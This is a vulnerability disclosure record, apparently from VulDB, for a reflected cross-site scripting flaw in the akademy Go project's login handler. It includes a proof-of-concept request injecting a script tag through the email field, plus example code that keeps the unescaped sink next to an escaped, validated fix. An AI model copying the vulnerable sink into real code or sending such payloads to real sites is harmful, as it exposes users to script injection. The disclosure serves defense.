Submission #397340: alwindoss akademy None Cross-site Scripting (XSS) Information

Title: alwindoss akademy None Cross-site Scripting (XSS)
Description: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in cmd/akademy/handler/handlers.go

Flaw reason: in cmd/akademy/handler/handlers.go line 40, the output directly includes the user's email address (obtained from the form values), without any form of filtering or escaping. This can result in reflected XSS attacks. When a malicious user enters an email address containing a malicious script, the script will be executed in the user's browser, allowing the attacker to perform various malicious actions, such as stealing user information, manipulating user sessions, and more.

Vulnerability POC: Suppose a malicious user enters an email address with a `<script>` tag, such as `<script>alert('XSS');</script>`. When other users visit this page, their browsers execute this JavaScript code, and a warning box pops up saying "XSS", thus proving that there is a vulnerability.

cmd/akademy/handler/handlers.go (excerpt):

```Go
package handler

import (
	"fmt"
	"net/http"
)

// HandleLogin implements PageHandler.
func (h pageHandler) HandleLogin(w http.ResponseWriter, r *http.Request) {
	fmt.Println("Handle Login")
	r.ParseForm()
	email := r.FormValue("emailAddress")
	fmt.Println("Email", email)
	// Sink: the raw form value is written into the response body unescaped.
	w.Write([]byte(email))
}
```

POC:

```
POST /login HTTP/1.1
Host: 192.168.1.7:8080
Content-Length: 148
Cache-Control: max-age=0
Origin: http://192.168.1.7:8080
DNT: 1
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.1.7:8080/login
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6,zh-TW;q=0.5
Cookie: csrf_token=4JyyOAwRuo9QF%2Bo71swuLmUwAEq15hh7AX/+Flas=
Connection: keep-alive

csrf_token=Iw9pXtxC5SGAwRuo9QF%2Bo71swuLmUwADk9tnAwRuo9QF%2Bo71swuLmUwAXbf0JbiLxPFkrjqc%2BA%3D%3D&emailAddress=<script>alert(1)</script>
```
![image](https://github.com/user-attachments/assets/0b983660-1b03-4de4-b6df-94b35b7493da) ![image](https://github.com/user-attachments/assets/94f553fb-0320-4bc7-a4a3-6175a6e9a6e2)
Source: https://github.com/alwindoss/akademy/issues/1
User: zihe (UID 56943)
Submitted: 24 Aug 2024 10:42 (2 years ago)
Moderation: 4 Sep 2024 08:58 (11 days later)
Status: Accepted
VulDB Entry: 276487 [alwindoss akademy up to 35caccea888ed63d5489e211c99edff1f62efdba handlers.go emailAddress cross site scripting]
Points: 20
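The following is an added example written for this record; it is not code from the akademy project or from the submitter. It reproduces the reported sink (a form value written straight into the response) next to a hardened handler that validates the address with net/mail and renders the echo through html/template, which escapes the value for the HTML text context. The `/login` path and the `emailAddress` field come from the submission; the template text, the `postLogin` driver and the sample inputs are constructed for this example.

```go
package main

import (
	"bytes"
	"fmt"
	"html/template"
	"net/http"
	"net/http/httptest"
	"net/mail"
	"net/url"
	"strings"
)

// vulnerableLogin mirrors the sink reported in the submission: the submitted
// emailAddress form value is written into the response body unescaped.
func vulnerableLogin(w http.ResponseWriter, r *http.Request) {
	r.ParseForm()
	email := r.FormValue("emailAddress")
	w.Write([]byte(email))
}

// loginTmpl is a constructed template (not from the akademy project). Because
// it is parsed by html/template rather than text/template, {{.}} is escaped
// for the HTML text context, so markup inside the value is rendered inert.
var loginTmpl = template.Must(template.New("login").Parse(
	`<p>Signed in as {{.}}</p>`))

// renderLogin executes the template into a buffer so the escaping can be
// inspected independently of the HTTP layer.
func renderLogin(email string) (string, error) {
	var buf bytes.Buffer
	if err := loginTmpl.Execute(&buf, email); err != nil {
		return "", err
	}
	return buf.String(), nil
}

// safeLogin is the hardened form: it checks the form parsed, rejects values
// that are not syntactically an email address, declares the content type,
// and only then echoes the value through the escaping template.
func safeLogin(w http.ResponseWriter, r *http.Request) {
	if err := r.ParseForm(); err != nil {
		http.Error(w, "bad form", http.StatusBadRequest)
		return
	}
	email := r.FormValue("emailAddress")
	if _, err := mail.ParseAddress(email); err != nil {
		http.Error(w, "invalid email address", http.StatusBadRequest)
		return
	}
	w.Header().Set("Content-Type", "text/html; charset=utf-8")
	out, err := renderLogin(email)
	if err != nil {
		http.Error(w, "render failed", http.StatusInternalServerError)
		return
	}
	w.Write([]byte(out))
}

// postLogin drives a handler with a form POST to /login, the same shape as the
// captured request in the submission, and returns the status code and body.
func postLogin(h http.HandlerFunc, email string) (int, string) {
	form := url.Values{"emailAddress": {email}}
	req := httptest.NewRequest(http.MethodPost, "/login",
		strings.NewReader(form.Encode()))
	req.Header.Set("Content-Type", "application/x-www-form-urlencoded")
	rec := httptest.NewRecorder()
	h(rec, req)
	return rec.Code, rec.Body.String()
}

func main() {
	payload := "<script>alert(1)</script>" // the value from the submission's POC

	code, body := postLogin(vulnerableLogin, payload)
	fmt.Printf("vulnerable: %d %q\n", code, body)

	// The hardened handler rejects the payload outright because it is not an
	// address; the template alone would still have neutralised it.
	code, body = postLogin(safeLogin, payload)
	fmt.Printf("hardened:   %d %q\n", code, body)
	escaped, _ := renderLogin(payload)
	fmt.Printf("template output for payload: %q\n", escaped)

	code, body = postLogin(safeLogin, "alice@example.com")
	fmt.Printf("hardened, valid address: %d %q\n", code, body)
}
```

Validation is kept as a separate layer on purpose: a quoted local part can legally contain characters such as `<` and `>`, so a syntax check on its own does not make the echo safe; the contextual escaping performed by html/template is what keeps the reflected value inert.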
